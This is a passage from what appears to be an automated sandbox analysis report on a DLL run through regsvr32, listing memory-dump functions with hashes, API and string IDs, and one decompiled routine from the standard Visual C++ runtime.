                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                                                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2560055391-3497434347
                                                                                • Opcode ID: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                                                • Instruction ID: 09e822ffce5aca71844268e09504d4e1b75e9746d2cd7e971170a10d490b8227
                                                                                • Opcode Fuzzy Hash: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                                                • Instruction Fuzzy Hash: FDC1097290C6C68AE7718B14E8443AAB7F4FB85744F488135E6AC86A9DDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52479290 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 142COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __doserrno$_invalid_parameter
                                                                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                                                • API String ID: 747159061-1442092225
                                                                                • Opcode ID: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                                                • Instruction ID: 1156c5fa22bb78562ce6eba20f9c2f8eb6246edff4e6241685995f1b0017dff3
                                                                                • Opcode Fuzzy Hash: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                                                • Instruction Fuzzy Hash: 4E616772A18A4686E7109B25EC9036A73F1FB827A4F588731E67D476D9DFBCE401CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246B12B Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                                                                • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                                                                • API String ID: 1778837556-2487400587
                                                                                • Opcode ID: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                                                • Instruction ID: d850db067d59b36df44d7ccd0adb2c169ef94ded2bc34730e9aae60deb5c084d
                                                                                • Opcode Fuzzy Hash: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                                                • Instruction Fuzzy Hash: C551C376618AC191E734CB04E8803EAB7F1FB89394F448135EA8D42AADDFBCE154CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247C435 Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 307COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                                                                • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 83251219-3442986447
                                                                                • Opcode ID: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                                                • Instruction ID: 3acfa62c8cf6766660a237f446ea070c86ab20c4a99c5658ae12d1c3de0622b2
                                                                                • Opcode Fuzzy Hash: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                                                • Instruction Fuzzy Hash: BDF1F67250CBC18AE7718B15E8843AAB7F4E786744F184135E69D86A9DDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524807C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 141COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                                                                • API String ID: 2123368286-2816485415
                                                                                • Opcode ID: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                                                • Instruction ID: 820da16cd7ac5596269b35855b8f77bcc6be9b4014b15a951e68a1933e911f28
                                                                                • Opcode Fuzzy Hash: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                                                • Instruction Fuzzy Hash: F7615F71A3864A96E7509B20EC8077A73F1FB92354F589235E66E46ADDDFBCE440CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52480A20 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __doserrno$_invalid_parameter
                                                                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                                                                • API String ID: 747159061-2992490823
                                                                                • Opcode ID: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                                                • Instruction ID: 042fdc776fffcd2fe842acdb2b48905418aa3cb59c45fbd044c4bb4c35af2e7d
                                                                                • Opcode Fuzzy Hash: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                                                • Instruction Fuzzy Hash: 8E515B31A2CA4696E7109B60E89537A73F1FB82794F589235E66D476E9DFBCE400CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52467640 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 290COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                                                • API String ID: 1930727954-3864165772
                                                                                • Opcode ID: 5564b6dcabe9d7da129c176dbab2495a25b1b938b9ffe894bef786fc52173cea
                                                                                • Instruction ID: b3c53ac2c416afa913de42937b9483f9a56f4e815ea31c913a587c66b23ac9eb
                                                                                • Opcode Fuzzy Hash: 5564b6dcabe9d7da129c176dbab2495a25b1b938b9ffe894bef786fc52173cea
                                                                                • Instruction Fuzzy Hash: C9F1EA22609BC5C9E770CB19E88076AB7B0F786B64F148226CAAD477E8DF7CD445CB11
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247E2FC Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 231COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                                                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 1328470723-1899493600
                                                                                • Opcode ID: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                                                • Instruction ID: 67090b6cbc7cb9cb6b36ca12a24cf551c7c14139d9c093944754f8074d61b328
                                                                                • Opcode Fuzzy Hash: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                                                • Instruction Fuzzy Hash: 46C1FB76A1CA828AE7748B14E8407ABB7F0FB85355F488135D69D87A99DFBCE441CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246EFB0 Relevance: 16.7, APIs: 11, Instructions: 200memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                                                                • String ID:
                                                                                • API String ID: 2352934578-0
                                                                                • Opcode ID: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                                                • Instruction ID: bc7e83dcf72b578842d02bd648b1958f98004a2ca6149ecf888bc7e4f1bcd234
                                                                                • Opcode Fuzzy Hash: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                                                • Instruction Fuzzy Hash: 4CB1D43290C7818AE760CB55E84476AB7F0F78A794F158125EADE47B98DBBCE4848F40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52473380 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 330COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                                                                • API String ID: 2123368286-322314505
                                                                                • Opcode ID: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                                                • Instruction ID: ad4ec671702c8caf887fa4b0fe2b4d556eba4412ad1b0c60a8c78c242be498eb
                                                                                • Opcode Fuzzy Hash: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                                                • Instruction Fuzzy Hash: 90022F31A1CB8585EBB49B24E84437A67F0FB86794F188535D6AD83BD9DFBCD0858B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247E424 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 307COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 1139040907-3988320827
                                                                                • Opcode ID: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                                                • Instruction ID: bcafbdaf528383cec6508ff0f168c7b1becb4dfb1429a522a6bbc7bd7ef942a6
                                                                                • Opcode Fuzzy Hash: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                                                • Instruction Fuzzy Hash: CCF1FA7660CA818AE7648B15E8403ABB7F0FB86745F188135E69D87A99DFBCD441CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52471640 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 233COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                                                                • API String ID: 2123368286-3300880850
                                                                                • Opcode ID: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                                                • Instruction ID: db939f6c851c2bb8b3384be7a5bf4051eead2c39c19688978390050b8158daeb
                                                                                • Opcode Fuzzy Hash: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                                                • Instruction Fuzzy Hash: 81C11E31A1CB8685EB708B15E85436A63F0FB86794F588135D6AE43B9DDFBCD445CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246D490 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 228COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                                                                • API String ID: 2123368286-3045918802
                                                                                • Opcode ID: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                                                • Instruction ID: 2e7e78141a037d4db5c94abfb6da0846a8a185172880bf108d9233df77ee881d
                                                                                • Opcode Fuzzy Hash: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                                                • Instruction Fuzzy Hash: A0C13A31A1CB9AC5EB708B14E84436A63F0F786794F548136D6AE43BADDFBCE4448B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247F000 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 164COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 15%
                                                                                			E00007FFA7FFA5247F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
				intOrPtr _v24;
				long long _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v88;
				intOrPtr _v96;
				long long _v104;
				void* _t80;
				void* _t81;
				void* _t89;
				void* _t92;
				intOrPtr _t102;
				intOrPtr* _t136;
				intOrPtr* _t137;
				intOrPtr* _t139;
				signed char* _t141;
				intOrPtr* _t142;
				intOrPtr* _t143;
				intOrPtr* _t144;
				intOrPtr* _t148;
				intOrPtr* _t149;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if (_a16 == 0) goto 0x5247f031;
				if (_a24 != 0) goto 0x5247f038;
				goto 0x5247f31a;
				_t136 = _a16;
				if ( *_t136 != 0) goto 0x5247f066;
				if (_a8 == 0) goto 0x5247f05f;
				 *_a8 = 0;
				goto 0x5247f31a;
				0x524666b0();
				_t80 = E00007FFA7FFA52466840(0,  &_v88);
				_t137 =  *_t136;
				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0x5247f0d2;
				_t81 = E00007FFA7FFA52466840(_t80,  &_v88);
				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0x5247f0d2;
				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
				_v104 = _t139;
				r9d = 0;
				r8d = 0x47;
				0x5246b3b0();
				if (_t81 != 1) goto 0x5247f0d2;
				asm("int3");
				E00007FFA7FFA52466840(0,  &_v88);
				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0x5247f121;
				if (_a8 == 0) goto 0x5247f106;
				_t141 = _a16;
				 *_a8 =  *_t141 & 0x000000ff;
				_v56 = 1;
				E00007FFA7FFA52466800( &_v88);
				goto 0x5247f31a;
				E00007FFA7FFA52466840(_v56,  &_v88);
				if (E00007FFA7FFA52472B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0x5247f276;
				_t89 = E00007FFA7FFA52466840(_t88,  &_v88);
				_t142 =  *_t141;
				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0x5247f1f3;
				E00007FFA7FFA52466840(_t89,  &_v88);
				_t143 =  *_t142;
				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0x5247f1f3;
				if (_a8 == 0) goto 0x5247f191;
				_v36 = 1;
				goto 0x5247f199;
				_v36 = 0;
				_t92 = E00007FFA7FFA52466840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
				_t144 =  *_t143;
				_v32 = _t144;
				E00007FFA7FFA52466840(_t92,  &_v88);
				_v96 = _v36;
				_v104 = _a8;
				r9d =  *((intOrPtr*)(_v32 + 0x10c));
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x5247f247;
				E00007FFA7FFA52466840(_t94,  &_v88);
				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0x5247f221;
				_t148 = _a16;
				if ( *((char*)(_t148 + 1)) != 0) goto 0x5247f247;
				0x5246ab30();
				 *_t148 = 0x2a;
				_v52 = 0xffffffff;
				E00007FFA7FFA52466800( &_v88);
				goto 0x5247f31a;
				E00007FFA7FFA52466840(_v52,  &_v88);
				_t149 =  *_t148;
				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
				E00007FFA7FFA52466800( &_v88);
				_t102 = _v48;
				goto 0x5247f310;
				if (_a8 == 0) goto 0x5247f28b;
				_v24 = 1;
				goto 0x5247f293;
				_v24 = 0;
				E00007FFA7FFA52466840(_t102,  &_v88);
				_v96 = _v24;
				_v104 = _a8;
				r9d = 1;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x5247f2f8;
				0x5246ab30();
				 *((intOrPtr*)( *_t149)) = 0x2a;
				_v44 = 0xffffffff;
				E00007FFA7FFA52466800( &_v88);
				goto 0x5247f31a;
				_v40 = 1;
				E00007FFA7FFA52466800( &_v88);
				goto 0x5247f31a;
				return E00007FFA7FFA52466800( &_v88);
			}




























                                                                                0x7ffa5247f000
                                                                                0x7ffa5247f005
                                                                                0x7ffa5247f00a
                                                                                0x7ffa5247f00f
                                                                                0x7ffa5247f024
                                                                                0x7ffa5247f02f
                                                                                0x7ffa5247f033
                                                                                0x7ffa5247f038
                                                                                0x7ffa5247f045
                                                                                0x7ffa5247f050
                                                                                0x7ffa5247f05c
                                                                                0x7ffa5247f061
                                                                                0x7ffa5247f073
                                                                                0x7ffa5247f07d
                                                                                0x7ffa5247f082
                                                                                0x7ffa5247f08c
                                                                                0x7ffa5247f093
                                                                                0x7ffa5247f0a2
                                                                                0x7ffa5247f0a4
                                                                                0x7ffa5247f0ab
                                                                                0x7ffa5247f0b0
                                                                                0x7ffa5247f0b3
                                                                                0x7ffa5247f0c5
                                                                                0x7ffa5247f0cd
                                                                                0x7ffa5247f0cf
                                                                                0x7ffa5247f0d7
                                                                                0x7ffa5247f0e3
                                                                                0x7ffa5247f0ee
                                                                                0x7ffa5247f0f0
                                                                                0x7ffa5247f103
                                                                                0x7ffa5247f106
                                                                                0x7ffa5247f113
                                                                                0x7ffa5247f11c
                                                                                0x7ffa5247f126
                                                                                0x7ffa5247f140
                                                                                0x7ffa5247f14b
                                                                                0x7ffa5247f150
                                                                                0x7ffa5247f15a
                                                                                0x7ffa5247f165
                                                                                0x7ffa5247f16a
                                                                                0x7ffa5247f17a
                                                                                0x7ffa5247f185
                                                                                0x7ffa5247f187
                                                                                0x7ffa5247f18f
                                                                                0x7ffa5247f191
                                                                                0x7ffa5247f19e
                                                                                0x7ffa5247f1a3
                                                                                0x7ffa5247f1a6
                                                                                0x7ffa5247f1b0
                                                                                0x7ffa5247f1bc
                                                                                0x7ffa5247f1c8
                                                                                0x7ffa5247f1d2
                                                                                0x7ffa5247f1f1
                                                                                0x7ffa5247f1f8
                                                                                0x7ffa5247f20f
                                                                                0x7ffa5247f211
                                                                                0x7ffa5247f21f
                                                                                0x7ffa5247f221
                                                                                0x7ffa5247f226
                                                                                0x7ffa5247f22c
                                                                                0x7ffa5247f239
                                                                                0x7ffa5247f242
                                                                                0x7ffa5247f24c
                                                                                0x7ffa5247f251
                                                                                0x7ffa5247f25a
                                                                                0x7ffa5247f263
                                                                                0x7ffa5247f268
